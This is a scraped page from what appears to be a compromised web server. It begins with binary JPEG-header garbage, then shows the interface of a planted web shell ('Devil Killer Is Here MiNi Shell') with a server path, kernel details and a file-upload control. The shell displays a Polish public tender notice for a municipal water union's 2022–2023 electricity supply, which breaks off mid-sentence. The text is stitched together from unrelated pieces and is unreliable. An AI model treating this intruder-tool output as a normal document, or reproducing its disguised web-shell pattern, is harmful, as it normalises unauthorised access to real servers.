JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211011/0022689801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa energii elektrycznej w okresie 01.01.2022 – 31.12.2023” - powtórzenie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Związek Gminny PROKADO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 53091950800000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prószków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">prokado.proszkow@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.prokado.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zbiorowe zaopatrzenie w wodę ludności </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa energii elektrycznej w okresie 01.01.2022 – 31.12.2023” - powtórzenie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af91ff68-2a4a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00226898</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00182211/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa energii elektrycznej w okresie 01.01.2022 – 31.12.2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.prokado.pl, https://miniportal.uzp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAP-u, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: prokado.proszkow@gmail.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej. Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy postępowania:<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz w Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP/pocztę elektroniczną.<br/>Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu:<br/>https://miniportal.uzp.gov.pl oraz ze strony głównej BIP Zamawiającego:<br/>http://bip.prokado.pl/127/116/przetargi-2019.html wybierając niniejsze postępowanie.<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami, w<br/>szczególności: składanie oświadczeń, wniosków (nie dotyczy składania ofert i oświadczeń o braku<br/>podstaw wykluczenia i spełnianiu warunków udziału w postępowaniu), zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza:<br/>„Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują<br/>się numerem referencyjnym postępowania.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej email:<br/>prokado.proszkow@gmail.com<br/>Dokumenty elektroniczne składane są przez Wykonawcę, za pośrednictwem „Formularza do<br/>komunikacji” , jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty<br/>elektronicznej, na wskazany w ust. 9 adres email.<br/>W przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 ustawy Pzp,<br/>Zamawiający przewiduje sposób komunikowania się za pośrednictwem operatora pocztowego w<br/>rozumieniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz.U.z 2020r.,poz.1041 z<br/>późń.zmianami), osobiście lub za pośrednictwem posłańca.<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020r.poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020<br/>r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz. U. z 2020r.,poz. 2415).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO” informuję, że:<br/>1)administratorem Pani/Pana danych osobowych jest Związek Gminny PROKADO,<br/>ul. Kościuszki 23, 46-060 Prószków;<br/>2)inspektorem ochrony danych w Związku Gmin PROKADO jest Pani Agata Przybyła,<br/>prokado.proszkow.gimal.com;<br/>3)Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego pn. „Dostawa energii elektrycznej w okresie 01.01.2022-31.12.2023”, numer<br/>zamówienia: ZP/01/2021, udzielenia zamówienia, prowadzenia dokumentacji księgowo-podatkowej,<br/>archiwizacji danych oraz dochodzenia roszczeń lub obrony przed roszczeniami;<br/>4)podstawą przetwarzania danych osobowych jest:<br/>a) ustawa z 11.09.2019 r. – Prawo zamówień publicznych;<br/>b) ustawa z 27.08.2009 r. o finansach publicznych;<br/>c) ustawa z 14.07.1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>d) art. 6 pkt.1 lit. c RODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na administratorze.<br/>5)odbiorcami Pani/Pana danych osobowych będą podmioty upoważnione na podstawie zawartych<br/>umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności<br/>osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18<br/>oraz art. 74-76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z<br/>wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6)Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania<br/>oraz przez okres wynikający z przepisów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, w<br/>szczególności zgodnie art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia<br/>publicznego przekracza 4 lata – przez cały okres obowiązywania umowy.<br/>7)posiada Pani/Pan prawo do:<br/>a) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby,<br/>której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub<br/>daty zakończonego postępowania o udzielenie zamówienia;<br/>b) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie<br/>tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>c) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów, w których zostały<br/>zebrane, lub w inny sposób przetwarzane;<br/>d) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 ustawy Pzp<br/>wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia.<br/>e) wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-<br/>913 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">)nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/02/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa energii elektrycznej w okresie od 01.01.2022 r. do<br/>31.12.2023 r. do punktów poboru energii elektrycznej należących do Zamawiającego i<br/>wymienionych w załączniku nr 3 do SWZ - Charakterystyka elektroenergetyczna punktów<br/>odbioru.<br/>2. Szczegółowy opis przedmiotu zamówienia<br/>Łączna ilość punktów poboru energii elektrycznej 8. (załącznik nr 3 do SWZ – (Charakterystyka<br/>elektroenergetyczna punktów odbioru)<br/>Łączne szacowane zapotrzebowanie na energię elektryczną dla wszystkich punktów objętych<br/>zamówieniem wynosi ok. 1 500 000,00 kWh.<br/>Szacunkowe zużycie energii ma charakter jedynie orientacyjny i nie stanowi zobowiązania do<br/>zakupu energii w podanej ilości. Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamawianej energii elektrycznej. Wykonawcy nie przysługuje żadne roszczenie z tego tytułu.<br/>Opis przedmiotu zamówienia określa załącznik nr 3 Charakterystyka elektroenergetyczna<br/>punktów poboru do SWZ.<br/>Dostawa energii elektrycznej odbywać się będzie na warunkach określonych przepisami ustawy<br/>z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz.U. z 2021r.,poz.716 z późń.zmianami) oraz<br/>zgodnie z wydanymi do tej ustawy przepisami wykonawczymi, w szczególności ze standardami<br/>jakości obsługi odbiorców określonymi w Rozporządzeniu Ministra Energii z dnia 6 marca 2019 r.<br/>w sprawie szczegółowych zasad kształtowania i kalkulacji taryf oraz rozliczeń w obrocie energią<br/>elektryczną. Parametry jakościowe energii elektrycznej w części dystrybucyjnej reguluje<br/>Rozporządzenie Ministra Gospodarki z dnia 4 maja 2007 w sprawie szczegółowych warunków<br/>funkcjonowania systemu elektroenergetycznego.<br/>Energia elektryczna powinna być dostarczana nieprzerwanie oraz powinna spełniać parametry<br/>techniczne zgodnie z zapisami Prawa Energetycznego oraz rozporządzeniami wykonawczymi<br/>do tej ustawy i normami europejskimi i normami polskimi. .<br/>Dostawa i sprzedaż energii elektrycznej odbywać się będzie za pośrednictwem sieci<br/>dystrybucyjnej należącej do lokalnego Operatora Systemu Dystrybucyjnego (OSD) - TAURON<br/>Dystrybucja S.A. Oddział w Opolu, ul. Waryńskiego 1, z którym Zamawiający posiada podpisaną<br/>umowę o świadczenie usług dystrybucyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie<br/>uznana za najkorzystniejszą. Oferta najkorzystniejsza jest ta, która jest ważna i nie podlega odrzuceniu<br/>oraz która według kryteriów oceny ofert okreslonych w SWZ przedstawia najkorzystniejszy stosunej<br/>jakości do ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków udziału w postępowaniu, określonych w art. 112 ust. 2 pkt 4 ustawy Pzp, odnoszących się do zdolności<br/>technicznej lub zawodowej, polegających na:<br/>1)Wykonawca musi wykazać, że posiada koncesję na prowadzenie działalności gospodarczej w<br/>zakresie obrotu energią wydaną przez Prezesa Urzędu Regulacji Energetyki, zgodną z ustawą z<br/>dnia 10 kwietnia 1997 r. Prawo Energetyczne;<br/>2) Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał lub wykonuje<br/>co najmniej jedno zamówienie na dostawę energii elektrycznej przez okres minimum jednego<br/>roku o łącznej ilości co najmniej 770 MWh. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)Wykonawca musi wykazać, że posiada koncesję na prowadzenie działalności gospodarczej w<br/>zakresie obrotu energią wydaną przez Prezesa Urzędu Regulacji Energetyki, zgodną z ustawą z dnia<br/>10 kwietnia 1997 r. Prawo Energetyczne;<br/>2) Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał lub wykonuje co najmniej<br/>jedno zamówienie na dostawę energii elektrycznej przez okres minimum jednego roku o łącznej ilości<br/>co najmniej 770 MWh.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">formularza oferty; – szczegółowy formularz cenowy; - oświadczenia<br/>Wykonawcy/Wykonawców o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu; wykaz wykonanych dostaw; zobowiązania i oświadczenia podmiotów do oddania<br/>Wykonawcy do dyspozycji niezbędnych zasobów; oświadczenia o przynależności do grupy kapitałowej.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia;<br/>2) w przypadku, o którym mowa w pkt 1, Wykonawcy ustanawiają Pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3) zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia; Wszelka korespondencja prowadzona będzie wyłącznie z<br/>Pełnomocnikiem;<br/>4) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia wskazują w treści oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy;<br/>5) warunek w zakresie doświadczenia, dotyczący zdolności technicznej lub zawodowej musi potwierdzać co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>6) oferta musi być podpisana w taki sposób, by poprawnie zobowiązywała wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>7) jeżeli w postępowaniu zostanie wybrana oferta wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców;<br/>8) Zamawiający nie zastrzega obowiązku osobistego wykonania, przez poszczególnych<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, kluczowych zadań<br/>dotyczących zamówień na roboty budowlane lub usługi;<br/>9) przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>10) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy;<br/>11) wypełniając formularz oferty należy wpisać dane (nazwa, adres itd.) Pełnomocnika (Lidera)<br/>oraz wszystkich Wykonawców wspólnie ubiegających się o zamówienie. W innych dokumentach<br/>(załączniki) powołujących się na Wykonawcę w miejscu np. nazwa, adres Wykonawcy, należy<br/>wpisać dane dotyczące Pełnomocnika (Lidera) i Wykonawcy, którego dany dokument<br/>(załącznik) 